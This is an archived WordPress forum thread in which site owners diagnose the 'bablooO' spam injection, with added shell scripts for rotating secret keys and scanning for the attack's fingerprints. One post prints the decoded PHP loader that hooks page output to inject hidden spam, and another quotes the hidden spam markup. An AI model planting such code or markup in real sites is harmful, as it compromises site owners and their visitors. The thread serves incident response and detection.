WordPress.org

bablooO/blyat attacks on WP 2.7.0 and 2.7.1 (24 posts)

  1. anoncobard
    Member
    Posted 4 years ago #

    One of my sites suffered an attack in recent weeks which I can't find documented in the WordPress forums.

    The symptom is hidden spam content in posts with an HTML comment fingerprint like:

    <!-- bablooO-start -->

    Some people report the string "blyat" instead of "bablooO". The attack has been reported for both 2.7.0 and 2.7.1 installations of WordPress. So far I can't find anyone who reports this problem and has figured out how the intruder got in. The most extensive discussion I can find is at:

    http://ckon.wordpress.com/2009/06/05/bablooo-spammer-attack-on-several-wp-blogs/

    Is this a known attack? Is there an official channel through which to report this kind of thing?

    Thanks.

    [Sorry for the anonymous handle but I don't want to advertise an unclosed vulnerability on my site.]

  2. SterlingCamden
    Member
    Posted 4 years ago #

    One of my sites is experiencing this as well, but the spam content is being injected into the RSS2 feed instead. I've upgraded to 2.8 and it still seems to be happening (unless it's being cached somewhere). I have not seen any of this spam in the posts themselves.

  3. anoncobard
    Member
    Posted 4 years ago #

    Sterling, when you say "it still seems to be happening" do you mean that you're seeing new spam content added even after you upgraded to 2.8?

    I saw in your ckon comment that you have the spam in your posts as well as in your RSS feed, it's just that it's invisible unless you view source. That's one of the characteristics of this attack.

    As near as I can tell from the discussion on ckon, some people are finding the spam inserted in their theme files (particularly footer.php, and particularly people who have writable themes folders and use the theme editor) while others are seeing it inserted into blog posts in their database. It sounds like you're in the latter category.

    You can see the extent of the damage to your database by using the WP Export feature (built right into WP, under Tools) to save your content as an XML file. Then load the XML file into a text editor and see how many posts the spam content shows up in.

    Checking for damage to your themes or other WP files is trickier unless you're comfortable with command-line tools like grep. If you're not a command-line person you could still FTP your theme files down to your desktop and examine them in a text editor.

    Please let us know if you find anything that might be useful.

  4. SterlingCamden
    Member
    Posted 4 years ago #

    Correction: the content was in the posts in the database, but it was enclosed in a <p> element that was styled with height:0 and width:0, so I could only see it in the feed or with "view source".

    I changed my admin password and cleaned the affected posts.

    Please notify me if/when you get more info on how this might have happened.

  5. SterlingCamden
    Member
    Posted 4 years ago #

    Just saw your response.

    I'm not seeing any damage to theme files. It was only in the posts themselves. I suppose this has to be some sort of password security breach -- either they hacked into my admin password or they found a way to get around the password permissions.

  6. SterlingCamden
    Member
    Posted 4 years ago #

    I have not seen any new spam content since I upgraded to 2.8 and changed the admin password. No other users have privileges beyond "Subscriber".

  7. anoncobard
    Member
    Posted 4 years ago #

    I found one hole: a third-party theme wasn't validating its arguments. I've confirmed that it was vulnerable to cross-site scripting (XSS) by appending javascript to a URL. Background:

    http://codex.wordpress.org/Data_Validation
    http://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet

    I added a line of input validation to the theme and sent the patch to the theme developers. Hole closed.

    Now my burning question is whether that hole is the likely source of my intrusion or there are others. The symptoms we bablooO victims describe seem most consistent with an intruder being able to log into WordPress using the admin account. In practical terms is a javascript insertion in the URL really likely to result in interactive access to the WP Dashboard?

  8. coolgeee
    Member
    Posted 4 years ago #

    <? /**/eval(base64_decode... ?>

    I found this code added to many of my files. I am uninstalling many of the sites now and going to older backups.

    Almost all of my WordPress sites on the same server have been attacked with this.

  9. anoncobard
    Member
    Posted 4 years ago #

    Coolgeee, was this code in addition to the bablooO spam HTML or instead of it?

  10. coolgeee
    Member
    Posted 4 years ago #

    I am checking now.

    But I do notice that almost all my files have this code added to the beginning of the files, like index.php, etc.

  11. coolgeee
    Member
    Posted 4 years ago #

    example:
    in the wp-app.php file here is the code (it is in all the files!!!):

    <? /**/eval(base64_decode('...')); ?>

  12. Samuel Wood (Otto)
    Tech Ninja
    Posted 4 years ago #

    In practical terms is a javascript insertion in the URL really likely to result in interactive access to the WP Dashboard?

    It's possible. If they can get some javascript onto your page in a permanent fashion, then the next time you (the admin) visits the page, that script could send them your admin cookie, which would let them get into the site even though they lacked the password.

    With the admin cookie, they effectively become the admin for a short period (until it expires). The first step would likely be an automated script injection, where they use the plugin or theme editor to inject php code into some file, giving them backdoor access. From there, they could do anything they want until you find and remove that code.

    Mitigation: You can instantly invalidate all cookies to the site by changing the secret keys. See here for info on how to do that: http://wordpress.org/support/topic/170987
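
One way to carry out the cookie-invalidation step Otto describes, as an added example that is not from the thread or from WordPress itself: it rewrites the four 2.7-era key defines in wp-config.php with fresh random values, and it assumes each is written on its own line in the stock define('AUTH_KEY', '...'); form.

```shell
#!/bin/sh
# Added example (not from the thread or from WordPress): rotate the secret keys in
# wp-config.php so every outstanding auth cookie stops validating. Assumes the
# four 2.7-era defines, one per line, as  define('AUTH_KEY', '...');

# Usage: rotate_wp_keys /path/to/wp-config.php   (edits the file in place)
rotate_wp_keys() {
  cfg="$1"
  work="$cfg.rotating"
  cp "$cfg" "$work" || return 1
  for k in AUTH_KEY SECURE_AUTH_KEY LOGGED_IN_KEY NONCE_KEY; do
    # 32 random bytes as 64 hex characters: only [0-9a-f], so the value is safe
    # inside the PHP single quotes and inside the sed replacement.
    new=$(od -An -v -tx1 -N 32 /dev/urandom | tr -d ' \n')
    [ ${#new} -eq 64 ] || return 1
    sed "s|define( *'$k', *'[^']*' *);|define('$k', '$new');|" "$work" > "$work.new" \
      && mv "$work.new" "$work" || return 1
  done
  mv "$work" "$cfg"
}

# How many of the key defines in $1 still carry the stock placeholder phrase.
count_placeholder_keys() {
  grep -c "_KEY', *'put your unique phrase here'" "$1" || true
}

# Constructed sample config (not a real site's file) for trying the function.
make_sample_config() {
  cat > "$1" <<'EOF'
<?php
define('AUTH_KEY',         'put your unique phrase here');
define('SECURE_AUTH_KEY',  'put your unique phrase here');
define('LOGGED_IN_KEY',    'put your unique phrase here');
define('NONCE_KEY',        'put your unique phrase here');
define('DB_NAME', 'wordpress');
EOF
}

# Stand-alone demo on a throwaway copy.
demo_cfg=$(mktemp)
make_sample_config "$demo_cfg"
echo "placeholder keys before: $(count_placeholder_keys "$demo_cfg")"
rotate_wp_keys "$demo_cfg"
echo "placeholder keys after:  $(count_placeholder_keys "$demo_cfg")"
rm -f "$demo_cfg"
```

Changing the keys logs every user out, including the admin, which is the point; a stolen cookie issued under the old keys no longer validates.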

  13. Samuel Wood (Otto)
    Tech Ninja
    Posted 4 years ago #

    But I do notice that almost all my file have this code added to the beginning of the files, like index.php, etc

    If that is the case, then it's probable that they got in via a different means. I have often seen this occur on shared webhosting services with poor security between different customers.

    In other words, if you're sharing a server with 50 other sites, and any one of those other sites gets hacked, then the attacker can run a script to automatically add his hack code to all the sites on that server, unless the server is well-secured (many are not). Usually these scripts look for anything ending in PHP, for example, and just add the code to them blindly.

  14. coolgeee
    Member
    Posted 4 years ago #

    thanks

    I will update any findings shortly

  15. coolgeee
    Member
    Posted 4 years ago #

    this is what my php.ini looks like:
    register_globals = off
    allow_url_fopen = off

    expose_php = Off
    max_input_time = 60
    variables_order = "EGPCS"
    extension_dir = ./
    upload_tmp_dir = /tmp
    precision = 12
    SMTP = relay-hosting.secureserver.net
    url_rewriter.tags = "a=href,area=href,frame=src,input=src,form=,fieldset="

    [Zend]
    zend_extension=/usr/local/zo/ZendExtensionManager.so
    zend_extension=/usr/local/zo/4_3/ZendOptimizer.so

    does this look corrupt?

  16. coolgeee
    Member
    Posted 4 years ago #

    All these files also had code added to them.

    wp-pass.php
    wp-commentsrss2.php

    my wp-pass.php:
    <?php
    /**
     * Creates the password cookie and redirects back to where the
     * visitor was before.
     *
     * @package WordPress
     */

    /** Make sure that the WordPress bootstrap has ran before continuing. */
    require( dirname(__FILE__) . '/wp-load.php');

    if ( get_magic_quotes_gpc() )
        $_POST['post_password'] = stripslashes($_POST['post_password']);

    // 10 days
    setcookie('wp-postpass_' . COOKIEHASH, $_POST['post_password'], time() + 864000, COOKIEPATH);

    wp_safe_redirect(wp_get_referer());
    ?>

  17. coolgeee
    Member
    Posted 4 years ago #

    bump

    anyone else have this issue?

    It totally infected every php file across 15 domains!

  18. Same server or different servers?

  19. coolgeee
    Member
    Posted 4 years ago #

    same server

    I uninstalled about 10 sites already.

    3 sites I really do not want to lose, so I am copying them to my harddrive and then I will manually delete all corrupt files.

    Any easier way?

  20. coolgeee
    Member
    Posted 4 years ago #

    I am still wondering how the hack happened?

  21. If it's the same server then it's easy: your server is not secure. There is not a lot WordPress can prevent if your server gets compromised.

    Backing up alone will not do it, you need to identify via your servers logs how the exploit got onto your blogs. If you just clean it up without closing the door, you will be back here again with the same problem.

    Read up on the link I posted to you in the other thread:

    http://wordpress.org/support/topic/268083?replies=5#post-1065779

    Also read up on "Hardening WordPress" as well.

    Good luck.

  22. fennecfanatic
    Member
    Posted 4 years ago #

    The contents of that base64 block:
    // Guard: run once per request, only if output buffering is available.
    if (function_exists('ob_start') && !isset($GLOBALS['sh_no'])) {
        $GLOBALS['sh_no'] = 1;
        // The real payload lives in a second dropped file disguised as a stylesheet.
        if (file_exists('/home/content/g/l/o/globalbizworks/html/informedny/Themes/default/images/post/style.css.php')) {
            include_once('/home/content/g/l/o/globalbizworks/html/informedny/Themes/default/images/post/style.css.php');
            if (function_exists('gml') && !function_exists('dgobh')) {
                // gzip-header parser, so the hook still works when the page output is gzip-compressed.
                if (!function_exists('gzdecode')) {
                    function gzdecode($R20FD65E9C7406034FADC682F06732868) {
                        $R6B6E98CDE8B33087A33E4D3A497BD86B = ord(substr($R20FD65E9C7406034FADC682F06732868, 3, 1));
                        $R60169CD1C47B7A7A85AB44F884635E41 = 10;
                        $R0D54236DA20594EC13FC81B209733931 = 0;
                        if ($R6B6E98CDE8B33087A33E4D3A497BD86B & 4) {
                            $R0D54236DA20594EC13FC81B209733931 = unpack('v', substr($R20FD65E9C7406034FADC682F06732868, 10, 2));
                            $R0D54236DA20594EC13FC81B209733931 = $R0D54236DA20594EC13FC81B209733931[1];
                            $R60169CD1C47B7A7A85AB44F884635E41 += 2 + $R0D54236DA20594EC13FC81B209733931;
                        }
                        if ($R6B6E98CDE8B33087A33E4D3A497BD86B & 8) {
                            $R60169CD1C47B7A7A85AB44F884635E41 = strpos($R20FD65E9C7406034FADC682F06732868, chr(0), $R60169CD1C47B7A7A85AB44F884635E41) + 1;
                        }
                        if ($R6B6E98CDE8B33087A33E4D3A497BD86B & 16) {
                            $R60169CD1C47B7A7A85AB44F884635E41 = strpos($R20FD65E9C7406034FADC682F06732868, chr(0), $R60169CD1C47B7A7A85AB44F884635E41) + 1;
                        }
                        if ($R6B6E98CDE8B33087A33E4D3A497BD86B & 2) {
                            $R60169CD1C47B7A7A85AB44F884635E41 += 2;
                        }
                        $RC4A5B5E310ED4C323E04D72AFAE39F53 = gzinflate(substr($R20FD65E9C7406034FADC682F06732868, $R60169CD1C47B7A7A85AB44F884635E41));
                        if ($RC4A5B5E310ED4C323E04D72AFAE39F53 === FALSE) {
                            $RC4A5B5E310ED4C323E04D72AFAE39F53 = $R20FD65E9C7406034FADC682F06732868;
                        }
                        return $RC4A5B5E310ED4C323E04D72AFAE39F53;
                    }
                }
                // Output-buffer callback: splices gml() (the spam block) in right after <body>, or at the top if there is no <body>.
                function dgobh($RDA3E61414E50AEE968132F03D265E0CF) {
                    Header('Content-Encoding: none');
                    $R3E33E017CD76B9B7E6C7364FB91E2E90 = gzdecode($RDA3E61414E50AEE968132F03D265E0CF);
                    if (preg_match('/\<body/si', $R3E33E017CD76B9B7E6C7364FB91E2E90)) {
                        return preg_replace('/(\<body[^\>]*\>)/si', '$1' . gml(), $R3E33E017CD76B9B7E6C7364FB91E2E90);
                    } else {
                        return gml() . $R3E33E017CD76B9B7E6C7364FB91E2E90;
                    }
                }
                ob_start('dgobh');
            }
        }
    }

  23. volleyballmaniac
    Member
    Posted 4 years ago #

    My site also got hacked hotguam.com (running on MU 2.7.1).

    That's what I get for being lazy. Fortunately I just did a full backup of all server files & DB, so I will be doing a full purge & replace & then upgrading.

  24. WP Jockey
    Member
    Posted 4 years ago #

    +1
    My WP 2.9.2 is getting hit by this regularly.
    Today I got a de-listing notice from Google because of it.
    Not happy.

    I removed the 321 lines of the following code from Footer.php below the QuantCast tag...

    <!-- bablooO-start --><style>div.VnvpcQAFEL {height: 0pt;width: 2pt;position: absolute;overflow: auto}</style><div class="VnvpcQAFEL"><a href="http://www.downtube.com/UCC/casino/index.html">australian online poker</a>
    <a href="http://www.downtube.com/UCC/casino/online-poker-leagues.html">online poker leagues</a>

    Obviously it goes on and on. I just wanted to include the "bablooO" and "VnvpcQAFEL" signatures in the hopes that we can stop these WP terrorists.

    Thank you for any help.
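
A scan for the fingerprints this thread has collected, as an added example that is not from the thread: the <!-- bablooO-start --> and blyat markers from post 1, the prepended eval(base64_decode( loader from post 11, the ob_start('dgobh') hook from the decoded block in post 22, and the VnvpcQAFEL class from post 24. It assumes a POSIX shell with find and grep, and it covers .php and .html files as well as the Tools > Export .xml file from post 3, so one run checks theme files and post content together.

```shell
#!/bin/sh
# Added example (not from the thread): scan a WordPress tree for the indicators
# reported in this thread. Paths and sample content below are constructed.

# One literal indicator per line (post 1, post 1, post 24, post 11, post 22).
INDICATORS="<!-- bablooO-start -->
blyat
VnvpcQAFEL
eval(base64_decode(
ob_start('dgobh')"

# Print "indicator<TAB>path" for every .php/.xml/.html file under $1 that
# contains an indicator. -F: patterns are literal strings, not regexes.
scan_wp_tree() {
  printf '%s\n' "$INDICATORS" | while IFS= read -r pat; do
    find "$1" -type f \( -name '*.php' -o -name '*.xml' -o -name '*.html' \) \
        -exec grep -lF -- "$pat" {} + 2>/dev/null \
      | while IFS= read -r f; do printf '%s\t%s\n' "$pat" "$f"; done
  done
}

# Number of indicator hits under $1 (0 means nothing found).
count_hits() {
  scan_wp_tree "$1" | grep -c . || true
}

# Constructed sample tree: one clean file, one file with the loader prepended
# (as in post 11), and a footer.php with the hidden div (as in post 24).
make_sample_tree() {
  mkdir -p "$1/wp-content/themes/default"
  printf '<?php\necho "clean";\n' > "$1/index.php"
  printf "<? /**/eval(base64_decode('%s')); ?>\n<?php\n// rest of file\n" QUJD \
    > "$1/wp-app.php"
  printf '<!-- bablooO-start --><style>div.VnvpcQAFEL {height: 0pt;width: 2pt;position: absolute;overflow: auto}</style>\n' \
    > "$1/wp-content/themes/default/footer.php"
}

# Stand-alone demo on a throwaway copy of the sample tree.
demo=$(mktemp -d)
make_sample_tree "$demo"
scan_wp_tree "$demo"
rm -rf "$demo"
```

A hit on eval(base64_decode( at the very start of a core file is the post 11/13 pattern and usually means every PHP file on the account needs checking, not just the one that was found.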

Topic Closed